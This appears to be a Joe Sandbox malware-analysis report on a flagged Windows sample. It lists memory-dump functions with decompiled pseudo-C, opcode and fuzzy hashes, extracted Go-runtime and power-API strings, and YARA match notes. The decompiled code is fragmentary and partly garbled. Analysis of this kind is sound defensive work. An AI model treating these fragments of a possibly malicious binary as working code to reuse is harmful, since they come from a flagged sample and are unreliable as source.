                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= throwing= until pc=, bound = , limit = /dev/stdinBad varintCancelIoExChorasmianCreatePipeDeprecatedDevanagariDnsQuery_WException GC forcedGOMAXPROCSGetIfEntry$ pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->status=, cons/mark -byte limitBidi_ControlGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetStdHandleGetTempPathWJoin_ControlLoadLibraryWMeetei_M$MB during sweep; swept Marquesas Standard TimeMauritius Standard TimeNoncharacter_Code_PointQyzylorda Standard TimeSetEnvironmentVariableWSingapore Standard TimeSri Lanka Standard TimeTocantins Standard TimeVenezuela Standard TimeVolgograd Standard TimeW. Euro$MB; allocated NetUserGetInfoOther_ID_StartPattern_SyntaxProcess32NextWQuotation_MarkRegSetValueExWSetFilePointerTranslateNameWallocfreetracebad allocCountbad restart PCbad span statefile too largefinalizer waitgcstoptheworldgetprotobynameinvalid syntaxis a dir$mismatched begin/end of activeSweepnetwork dropped connection on resetpersistentalloc: align is too largepidleput: P has non-empty run queueruntime: close polldesc w/o unblockruntime: createevent failed; errno=traceback did not unwind completelytransport endpo$pacer: sweep done at heap size pattern contains path separatorresetspinning: not a spinning mruntime: cannot allocate memoryruntime: failed to commit pagesruntime: split stack overflow: slice bounds out of range [%x:]slice bounds out of range [:%x] (types from$sweeper left outstanding across sweep generationsattempt to execute system stack code on user stackcompileCallback: function argument frame too largemallocgc called with gcphase == _GCmarkterminationrecursive call during initialization - linker skewruntime: un
                                                                                                                            • API String ID: 0-180825167
                                                                                                                            • Opcode ID: 771c4df9fa522db5d527c3879d7c3a13a9df7c27c15ba6ea30766c6e5a70ffe5
                                                                                                                            • Instruction ID: e9348b061fe42b9caa381da6d7c1fd15142ead841e8f817a2e3d17f4f1734fb1
                                                                                                                            • Opcode Fuzzy Hash: 771c4df9fa522db5d527c3879d7c3a13a9df7c27c15ba6ea30766c6e5a70ffe5
                                                                                                                            • Instruction Fuzzy Hash: 64417E36214B85CADB09EB58E48039A7764F798788F845535EE8E07735CF3CC584CB21
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0132BB00 Relevance: 8.8, Strings: 7, Instructions: 66COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 37%
                                                                                                                            			E0132BB00(void* __ecx, void* __edx, void* __edi, void* __esi, void* __esp, void* __rbx, void* __rsi, long long __rbp, void* __r8, void* __r9, void* __r10, void* __r11, void* __r13, void* __r14) {
				char _v8;
				void* _v16;
				char _v24;
				void* _v32;
				void* _v40;
				void* _v48;
				void* _v56;
				void* _v64;
				void* _v79;
				void* _v88;
				void* _v96;
				void* _v101;
				void* _v112;
				void* _v120;
				void* _v128;
				void* _v136;
				void* _v144;
				void* _t37;
				void* _t55;
				void* _t67;
				void* _t74;
				void* _t75;
				void* _t79;
				void* _t81;
				void* _t82;
				void* _t84;

				L0:
				while(1) {
					L0:
					_t84 = __r13;
					_t82 = __r11;
					_t81 = __r10;
					_t79 = __r8;
					_t67 = __rsi;
					_t37 = __ecx;
					if( &_v24 >  *((intOrPtr*)(__r14 + 0x10))) {
						break;
					}
					L20:
					E01356200(_t55, __rbp);
				}
				L1:
				_t75 = _t74 - 0x98;
				_v8 = __rbp;
			}





























                                                                                                                            0x0132bb00
                                                                                                                            0x0132bb00
                                                                                                                            0x0132bb00
                                                                                                                            0x0132bb00
                                                                                                                            0x0132bb00
                                                                                                                            0x0132bb00
                                                                                                                            0x0132bb00
                                                                                                                            0x0132bb00
                                                                                                                            0x0132bb00
                                                                                                                            0x0132bb09
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0132bc81
                                                                                                                            0x0132bc81
                                                                                                                            0x0132bc81
                                                                                                                            0x0132bb0f
                                                                                                                            0x0132bb0f
                                                                                                                            0x0132bb16

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: PowerReg$gisterSu$ication$powrprof$rof.dll$spendRes$umeNotif
                                                                                                                            • API String ID: 0-941992356
                                                                                                                            • Opcode ID: b514445300c5a3b3aca6a48b8e55db33b582dec6ce4bbfbeab8a075d64dc95d8
                                                                                                                            • Instruction ID: a11d3db25db187a85222d77b44635bb0cc8af499f4bcad3e2a8e391907b3823d
                                                                                                                            • Opcode Fuzzy Hash: b514445300c5a3b3aca6a48b8e55db33b582dec6ce4bbfbeab8a075d64dc95d8
                                                                                                                            • Instruction Fuzzy Hash: 433116B6608B9085DB20DB21F44039AB7A5F789BC4F988125EBDC47B6EDF38C154CB40
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A6BE74 Relevance: 7.7, APIs: 6, Instructions: 221COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 65%
                                                                                                                            			E0000025B25BF8A6BE74(long long __rax, long long __rbx, void* __rsi, long long _a8, long long _a16, long long _a24, long long _a32) {
				long long _v72;
				intOrPtr _v88;
				void* __rdi;
				void* __rbp;
				void* __r14;
				signed short _t52;
				signed int _t53;
				intOrPtr _t58;
				void* _t59;
				void* _t60;
				signed short _t61;
				void* _t78;
				void* _t95;
				void* _t105;
				signed int _t129;
				signed int _t130;
				signed int _t152;
				void* _t163;
				void* _t166;
				void* _t168;
				void* _t174;
				long long _t185;
				long long _t187;
				long long _t189;
				long long _t212;
				void* _t215;
				void* _t217;
				void* _t219;
				long long _t222;
				long long _t223;
				void* _t226;
				void* _t228;
				void* _t234;
				void* _t246;
				void* _t248;
				int _t250;
				long long _t251;
				int _t253;

				_t185 = __rax;
				_a8 = __rbx;
				E0000025B25BF8A73124(0x280, _t163, __rax, __rbx, __rsi, _t226);
				_t187 = _t185;
				E0000025B25BF8A73278(0x100, _t185);
				_a24 = _t185;
				E0000025B25BF8A73278(0x100, _t187);
				E0000025B25BF8A73278(0x80, _t187);
				r12d = 0;
				_t3 = _t246 + 8; // 0x8
				E0000025B25BF8A77A30(_t3, _t166, _t185, _t215);
				_t4 = _t246 + 0x43; // 0x43
				_a32 = _t185;
				E0000025B25BF8A77A64(_t4, _t166);
				_t6 = _t246 + 0x44; // 0x44
				E0000025B25BF8A779DC(_t6, _t166);
				_t7 = _t246 + 0x45; // 0x45
				E0000025B25BF8A779DC(_t7, _t166);
				_t8 = _t187 + 1; // 0x46
				E0000025B25BF8A779DC(_t8, _t166);
				_t9 = _t187 - 0x44; // 0x1
				E0000025B25BF8A77A64(_t9, _t166);
				_t10 = _t187 - 0x43; // 0x2
				_t52 = E0000025B25BF8A77A64(_t10, _t166);
				_t11 = _t187 - 0x42; // 0x3
				r13d = _t52 & 0x0000ffff;
				_t53 = E0000025B25BF8A779DC(_t11, _t166);
				_t12 = _t187 - 0x32; // 0x13
				E0000025B25BF8A779DC(_t12, _t166);
				_t13 = _t187 - 0x3c; // 0x9
				E0000025B25BF8A77A30(_t13, _t166, _t185, _t215);
				_t14 = _t187 - 0x3b; // 0xa
				_a16 = _t185;
				E0000025B25BF8A77A30(_t14, _t166, _t185, _t215);
				_v72 = _t185;
				malloc(_t253);
				_t251 = _t185;
				_t58 = E0000025B25BF8A779DC(_t7, _t166);
				_t164 = _t58;
				_t59 = E0000025B25BF8A779DC(_t8, _t166);
				_t18 = _t187 - 1; // 0x44
				_t60 = E0000025B25BF8A779DC(_t18, _t166);
				_t19 = _t246 + 0x43; // 0x43
				_t61 = E0000025B25BF8A77A64(_t19, _t166);
				r9d = _t59;
				r8d = _t60;
				_v88 = _t58;
				E0000025B25BF8A783C4(_t61 & 0x0000ffff, _t251);
				if (E0000025B25BF8A6DA14(_t187) == 0) goto 0xf8a6bf9d;
				E0000025B25BF8A78504();
				 *0xf8a9b400 = _t53;
				 *0xf8a9d868 = E0000025B25BF8A77A64(5, E0000025B25BF8A6DA14(_t187)) & 0x0000ffff;
				E0000025B25BF8A779DC(4, E0000025B25BF8A6DA14(_t187));
				malloc(_t250);
				_t218 = _t185;
				E0000025B25BF8A72D94(E0000025B25BF8A779DC(4, E0000025B25BF8A6DA14(_t187)), _t68, _t185, _t187, _t185, _t215, _t234);
				_t168 =  *0xf8a9b400 - r12d; // 0x2e2e2e2e
				if (_t168 <= 0) goto 0xf8a6c1b3;
				_t222 = _a16;
				_t227 = _a24;
				E0000025B25BF8A77FC4(r12d, _t187, _a32, _t185, _t222, _a24, _t251, _t248, _t246);
				E0000025B25BF8A794CC(4, 4, _t185, _t185, _t215, 0xf8a8bac4, _t185, _t217);
				r12d = 0;
				E0000025B25BF8A77FC4(0, _t187, _a32, _t185, _t222, _a24, _t251, __rsi, _t226);
				E0000025B25BF8A794CC(4, 4, _t185, _a24, _t215, 0xf8a8bac4, _t185);
				 *0xf8a9b404 = 1;
				E0000025B25BF8A794CC(4, 4, _t185, 0xf8aa6f80, _t215, 0xf8a8bac4, _v72);
				E0000025B25BF8A6D3EC(r13d, _t187, _t185, _t185, _t222, _t222);
				_t26 = _t246 + 4; // 0x4
				r9d = E0000025B25BF8A779DC(_t26, _t168);
				if (E0000025B25BF8A6D398(_t187, _a24, 0xf8aa6b40, _t222, _a24, _t218) <= 0) goto 0xf8a6c0c4;
				_t78 = E0000025B25BF8A77574(_t77, _t59, _t187, _t218, _t222, _t227);
				if (_t78 <= 0) goto 0xf8a6c0c4;
				E0000025B25BF8A7597C(_t78, _t78, _t187, _t218, _t222, _t227);
				if (_t78 == 0xffffffff) goto 0xf8a6c148;
				E0000025B25BF8A73A2C(_t78, _t185, E0000025B25BF8A6C1D8, E0000025B25BF8A6C1D8);
				if (E0000025B25BF8A779DC(0x1c, _t78 - 0xffffffff) == 0) goto 0xf8a6c0f3;
				E0000025B25BF8A6F5A0(0x1000, E0000025B25BF8A6C1D8, E0000025B25BF8A6C1D8, _t222, _t227);
				E0000025B25BF8A72270(E0000025B25BF8A6C1D8, E0000025B25BF8A6C1D8, 0xf8aa6b40);
				E0000025B25BF8A71CFC(0x80000, _t53, _t185, E0000025B25BF8A6C1D8, E0000025B25BF8A6C1D8, _t222, _t227);
				if (E0000025B25BF8A6DA14(E0000025B25BF8A6C1D8) == 0) goto 0xf8a6c11e;
				E0000025B25BF8A6DAAC();
				_t174 =  *0xf8a9d888 - r12d; // 0xd878
				if (_t174 <= 0) goto 0xf8a6c14e;
				E0000025B25BF8A6D36C(E0000025B25BF8A6C1D8, 0xf8aa6b40, _t222, _t227, _t218);
				_t242 = _t222;
				E0000025B25BF8A6D3EC(r13d, E0000025B25BF8A6C1D8, _t185, _t218, _t222, _t222);
				E0000025B25BF8A6D5A0(_t78, E0000025B25BF8A6C1D8, 0xf8aa6f80, 0xf8aa6b40, _t218, _t251);
				goto 0xf8a6c14e;
				r12d = 1;
				E0000025B25BF8A6D36C(E0000025B25BF8A6C1D8, 0xf8aa6b40, _t222, _t227, _t222);
				if (E0000025B25BF8A6DA14(E0000025B25BF8A6C1D8) == 0) goto 0xf8a6c161;
				E0000025B25BF8A78504();
				_t129 =  *0xf8a9b400; // 0x2e2e2e2e
				if (_t129 == 0) goto 0xf8a6c1b3;
				_t152 =  *0xf8a9d868; // 0xd816
				if (_t152 == 0) goto 0xf8a6c1a1;
				if (0x51eb851f * _t152 * _t129 >> 0x20 >> 5 == 0) goto 0xf8a6c199;
				E0000025B25BF8A6D9F4(_t222);
				_t130 =  *0xf8a9b400; // 0x2e2e2e2e
				goto 0xf8a6c19b;
				if (0 - _t130 >= 0) goto 0xf8a6c1a1;
				0xf8a6fdf8();
				_t180 =  *0xf8a9b400;
				if ( *0xf8a9b400 > 0) goto 0xf8a6bffa;
				_t212 = _t251;
				free(??);
				_t189 = _a8;
				_pop(_t219);
				_pop(_t223);
				_pop(_t228);
				goto E0000025B25BF8A78504;
				asm("int3");
				_a8 = _t189;
				_a16 = _t223;
				_t105 = r8d;
				_t95 = E0000025B25BF8A779DC(0x1c, _t180);
				if ( *0xf8a9b404 != 1) goto 0xf8a6c21c;
				if ((0 | _t95 != 0x00000000) == 0) goto 0xf8a6c21c;
				r8d = _t105;
				E0000025B25BF8A6CDF4(0, _t164, _t189, _t212, _t212, _t228, _t242, _t219);
				goto 0xf8a6c22c;
				r9d = 0;
				r8d = _t105;
				return E0000025B25BF8A6C23C(_t185, _t189);
			}









































                                                                                                                            0x25bf8a6be74
                                                                                                                            0x25bf8a6be74
                                                                                                                            0x25bf8a6be8d
                                                                                                                            0x25bf8a6be9a
                                                                                                                            0x25bf8a6be9d
                                                                                                                            0x25bf8a6beaa
                                                                                                                            0x25bf8a6beb2
                                                                                                                            0x25bf8a6bebf
                                                                                                                            0x25bf8a6bec4
                                                                                                                            0x25bf8a6bec7
                                                                                                                            0x25bf8a6becf
                                                                                                                            0x25bf8a6bed4
                                                                                                                            0x25bf8a6bed9
                                                                                                                            0x25bf8a6bee1
                                                                                                                            0x25bf8a6bee6
                                                                                                                            0x25bf8a6beeb
                                                                                                                            0x25bf8a6bef0
                                                                                                                            0x25bf8a6bef7
                                                                                                                            0x25bf8a6befc
                                                                                                                            0x25bf8a6bf01
                                                                                                                            0x25bf8a6bf06
                                                                                                                            0x25bf8a6bf09
                                                                                                                            0x25bf8a6bf0e
                                                                                                                            0x25bf8a6bf11
                                                                                                                            0x25bf8a6bf16
                                                                                                                            0x25bf8a6bf19
                                                                                                                            0x25bf8a6bf1d
                                                                                                                            0x25bf8a6bf22
                                                                                                                            0x25bf8a6bf27
                                                                                                                            0x25bf8a6bf2c
                                                                                                                            0x25bf8a6bf2f
                                                                                                                            0x25bf8a6bf34
                                                                                                                            0x25bf8a6bf37
                                                                                                                            0x25bf8a6bf3f
                                                                                                                            0x25bf8a6bf47
                                                                                                                            0x25bf8a6bf4c
                                                                                                                            0x25bf8a6bf53
                                                                                                                            0x25bf8a6bf56
                                                                                                                            0x25bf8a6bf5d
                                                                                                                            0x25bf8a6bf5f
                                                                                                                            0x25bf8a6bf64
                                                                                                                            0x25bf8a6bf69
                                                                                                                            0x25bf8a6bf6e
                                                                                                                            0x25bf8a6bf75
                                                                                                                            0x25bf8a6bf7a
                                                                                                                            0x25bf8a6bf7d
                                                                                                                            0x25bf8a6bf86
                                                                                                                            0x25bf8a6bf8a
                                                                                                                            0x25bf8a6bf96
                                                                                                                            0x25bf8a6bf98
                                                                                                                            0x25bf8a6bfa2
                                                                                                                            0x25bf8a6bfb7
                                                                                                                            0x25bf8a6bfbd
                                                                                                                            0x25bf8a6bfc4
                                                                                                                            0x25bf8a6bfcb
                                                                                                                            0x25bf8a6bfd8
                                                                                                                            0x25bf8a6bfdd
                                                                                                                            0x25bf8a6bfe4
                                                                                                                            0x25bf8a6bfea
                                                                                                                            0x25bf8a6bff2
                                                                                                                            0x25bf8a6c008
                                                                                                                            0x25bf8a6c01f
                                                                                                                            0x25bf8a6c031
                                                                                                                            0x25bf8a6c034
                                                                                                                            0x25bf8a6c04b
                                                                                                                            0x25bf8a6c068
                                                                                                                            0x25bf8a6c072
                                                                                                                            0x25bf8a6c080
                                                                                                                            0x25bf8a6c085
                                                                                                                            0x25bf8a6c099
                                                                                                                            0x25bf8a6c0a8
                                                                                                                            0x25bf8a6c0af
                                                                                                                            0x25bf8a6c0b8
                                                                                                                            0x25bf8a6c0bf
                                                                                                                            0x25bf8a6c0c7
                                                                                                                            0x25bf8a6c0d3
                                                                                                                            0x25bf8a6c0ec
                                                                                                                            0x25bf8a6c0f3
                                                                                                                            0x25bf8a6c0fb
                                                                                                                            0x25bf8a6c108
                                                                                                                            0x25bf8a6c114
                                                                                                                            0x25bf8a6c119
                                                                                                                            0x25bf8a6c11e
                                                                                                                            0x25bf8a6c125
                                                                                                                            0x25bf8a6c127
                                                                                                                            0x25bf8a6c12c
                                                                                                                            0x25bf8a6c135
                                                                                                                            0x25bf8a6c141
                                                                                                                            0x25bf8a6c146
                                                                                                                            0x25bf8a6c148
                                                                                                                            0x25bf8a6c14e
                                                                                                                            0x25bf8a6c15a
                                                                                                                            0x25bf8a6c15c
                                                                                                                            0x25bf8a6c161
                                                                                                                            0x25bf8a6c169
                                                                                                                            0x25bf8a6c16b
                                                                                                                            0x25bf8a6c173
                                                                                                                            0x25bf8a6c186
                                                                                                                            0x25bf8a6c188
                                                                                                                            0x25bf8a6c18d
                                                                                                                            0x25bf8a6c197
                                                                                                                            0x25bf8a6c19d
                                                                                                                            0x25bf8a6c1a1
                                                                                                                            0x25bf8a6c1a6
                                                                                                                            0x25bf8a6c1ad
                                                                                                                            0x25bf8a6c1b3
                                                                                                                            0x25bf8a6c1b6
                                                                                                                            0x25bf8a6c1bb
                                                                                                                            0x25bf8a6c1cf
                                                                                                                            0x25bf8a6c1d0
                                                                                                                            0x25bf8a6c1d1
                                                                                                                            0x25bf8a6c1d2
                                                                                                                            0x25bf8a6c1d7
                                                                                                                            0x25bf8a6c1d8
                                                                                                                            0x25bf8a6c1dd
                                                                                                                            0x25bf8a6c1ef
                                                                                                                            0x25bf8a6c1f4
                                                                                                                            0x25bf8a6c207
                                                                                                                            0x25bf8a6c20b
                                                                                                                            0x25bf8a6c20d
                                                                                                                            0x25bf8a6c215
                                                                                                                            0x25bf8a6c21a
                                                                                                                            0x25bf8a6c21c
                                                                                                                            0x25bf8a6c21f
                                                                                                                            0x25bf8a6c23b

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _snprintfmalloc$_errno$_callnewhfree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2229704131-0
                                                                                                                            • Opcode ID: 8eecdb483356f0b954d4a36b27d0a4f662cf21316c9e1d202b28ef47dae9652c
                                                                                                                            • Instruction ID: 0ba3a3b9b4cce2b7564613c5a0813368b66a4168edcf13156bdb359b9e45bf60
                                                                                                                            • Opcode Fuzzy Hash: 8eecdb483356f0b954d4a36b27d0a4f662cf21316c9e1d202b28ef47dae9652c
                                                                                                                            • Instruction Fuzzy Hash: 45919D23300E414AFF46EB619C5D7AD2291EB85BA2F745025BD0A47FCBDF38C50697A8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8ABFF70 Relevance: 7.7, APIs: 5, Instructions: 205COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$_invalid_parameter_noinfo$fseekmalloc$AllocateHeap_callnewh_fseek_nolock_ftelli64fclose
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 495604859-0
                                                                                                                            • Opcode ID: 79c507d9139c9cf0746154fa585ea5d11ca0be58d27818409f8204e11e5a27bf
                                                                                                                            • Instruction ID: aff91bf4e97bdf054c413b0f73bebd748d0eed03fee45ef7adbbef1e897019e7
                                                                                                                            • Opcode Fuzzy Hash: 79c507d9139c9cf0746154fa585ea5d11ca0be58d27818409f8204e11e5a27bf
                                                                                                                            • Instruction Fuzzy Hash: 0751C632618E084FEB4AEB289C497B972D1E789321F60426DF44BC36E7DF34D9028795
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8AD4C40 Relevance: 7.7, APIs: 5, Instructions: 201COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _lock$_calloc_crt_mtinitlocknum
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3962633935-0
                                                                                                                            • Opcode ID: 6a91c322c2208c0cc5917e027d28c1d38802243c18a0c81e6fca9182852f44ec
                                                                                                                            • Instruction ID: 480075a9823e2b5159944602787227d378f933b20e03d0caa689ca562a2d6643
                                                                                                                            • Opcode Fuzzy Hash: 6a91c322c2208c0cc5917e027d28c1d38802243c18a0c81e6fca9182852f44ec
                                                                                                                            • Instruction Fuzzy Hash: 47511632519F084FEB159F18CC893B5B7D1FB58321F25019DF88AC72A2D774D942CA9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8AB54F0 Relevance: 7.7, APIs: 6, Instructions: 175COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: free$_errno$_callnewhmalloc$AllocateHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4095668141-0
                                                                                                                            • Opcode ID: 275e72a1a4537dc3f62f669f0d4b1b91f56a3df3838bf1cecacd4077199b93be
                                                                                                                            • Instruction ID: fad87eda08862621f7e1a12370481001be60c369ca54558cd2a953f2e3a3dc3a
                                                                                                                            • Opcode Fuzzy Hash: 275e72a1a4537dc3f62f669f0d4b1b91f56a3df3838bf1cecacd4077199b93be
                                                                                                                            • Instruction Fuzzy Hash: 65411C32218F0D0BEB5A9A2C5C5937A76D5EB96361F28012DF587C3663EE30D80347D9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8ACCB20 Relevance: 7.6, APIs: 5, Instructions: 149COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$_fileno_getbuf_getptd_noexit_invalid_parameter_noinfo_isatty
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 304646821-0
                                                                                                                            • Opcode ID: 5722944fdc0497ae8122aebc1c652e2895b0754647bc67717356cdefe5aeff10
                                                                                                                            • Instruction ID: 169c89a8a1407a7babf307b3d4459769afc9b96ff5d7ebfe0f9bb9a32b2f950a
                                                                                                                            • Opcode Fuzzy Hash: 5722944fdc0497ae8122aebc1c652e2895b0754647bc67717356cdefe5aeff10
                                                                                                                            • Instruction Fuzzy Hash: BD51F432114E084FEF9AEF68CC8976577E0EB4A321F240699F815CB6E7D734C94087A8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8AC6994 Relevance: 7.6, APIs: 6, Instructions: 142COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$_snprintffreemalloc$AllocateBoundaryDeleteDescriptorHeap_callnewh_invalid_parameter_noinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 383335425-0
                                                                                                                            • Opcode ID: ef00ffaa1c95f5e46c3bfb43d181a54402f3adb2ac93eb35e9eb25758e4e68cf
                                                                                                                            • Instruction ID: 0fb626a932af8f4c04c0f69e5eee5935312c8b73b94188ac353cbd822edc4c7c
                                                                                                                            • Opcode Fuzzy Hash: ef00ffaa1c95f5e46c3bfb43d181a54402f3adb2ac93eb35e9eb25758e4e68cf
                                                                                                                            • Instruction Fuzzy Hash: 6C41082130CD484FDA5AAB2C6C193B537D2D78A321F64815DF08EC32A6DA24DC428799
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01310100 Relevance: 7.6, Strings: 6, Instructions: 132COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 70%
                                                                                                                            			E01310100(void* __eax, signed int __ecx, void* __esi, long long __rax, long long __rbx, long long __rcx, signed long long __rdi, long long __rbp, void* __r14, void* _a8, long long _a16, long long _a24, signed long long _a32) {
				char _v8;
				long long _v16;
				long long _v24;
				signed char* _v32;
				long long _v40;
				long long _v48;
				signed long long _v56;
				signed int _v60;
				intOrPtr _v64;
				long long _v72;
				char _v88;
				void* _v96;
				long long _v104;
				signed long long _v112;
				long long _v120;
				unsigned long long _v128;
				unsigned long long _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				void* _t89;
				intOrPtr _t111;
				signed int _t121;
				void* _t123;
				void* _t126;
				signed int _t133;
				long long _t137;
				long long _t152;
				unsigned long long _t155;
				unsigned long long _t158;
				long long _t161;
				signed long long _t162;
				long long _t163;
				unsigned long long _t164;
				unsigned long long _t165;
				signed char* _t166;
				char* _t168;
				void* _t172;
				void* _t173;
				void* _t177;
				char* _t182;
				long long _t186;
				void* _t187;
				long long* _t190;
				void* _t191;

				_t191 = __r14;
				_t162 = __rdi;
				_t152 = __rcx;
				_t150 = __rbx;
				_t136 = __rax;
				_t125 = __esi;
				_t121 = __ecx;
				_t88 = __eax;
				_t173 = _t172 - 0x50;
				_v8 = __rbp;
				_t168 =  &_v8;
				if(__rax == 0) {
					L17:
					_t137 = 0x138da1a;
					_t111 = 0x29;
					_t89 = E01330BA0(0x138da1a, _t150, _t168);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					L18:
					while(1) {
						if(_t173 <=  *((intOrPtr*)(_t191 + 0x10))) {
							L33:
							_v72 = _t137;
							_v64 = _t111;
							_v60 = _t121;
							_v56 = _t162;
							_v48 = _t163;
							_t89 = E01356200(_t155, _t168);
							_t137 = _v72;
							_t111 = _v64;
							_t121 = _v60;
							_t162 = _v56;
							_t163 = _v48;
							continue;
						}
						_t173 = _t173 - 0x60;
						_v88 = _t168;
						_t168 =  &_v88;
						_v72 = _t137;
						_v56 = _t162;
						_t155 =  *(_t163 + 0x20) << 0xd >> 3;
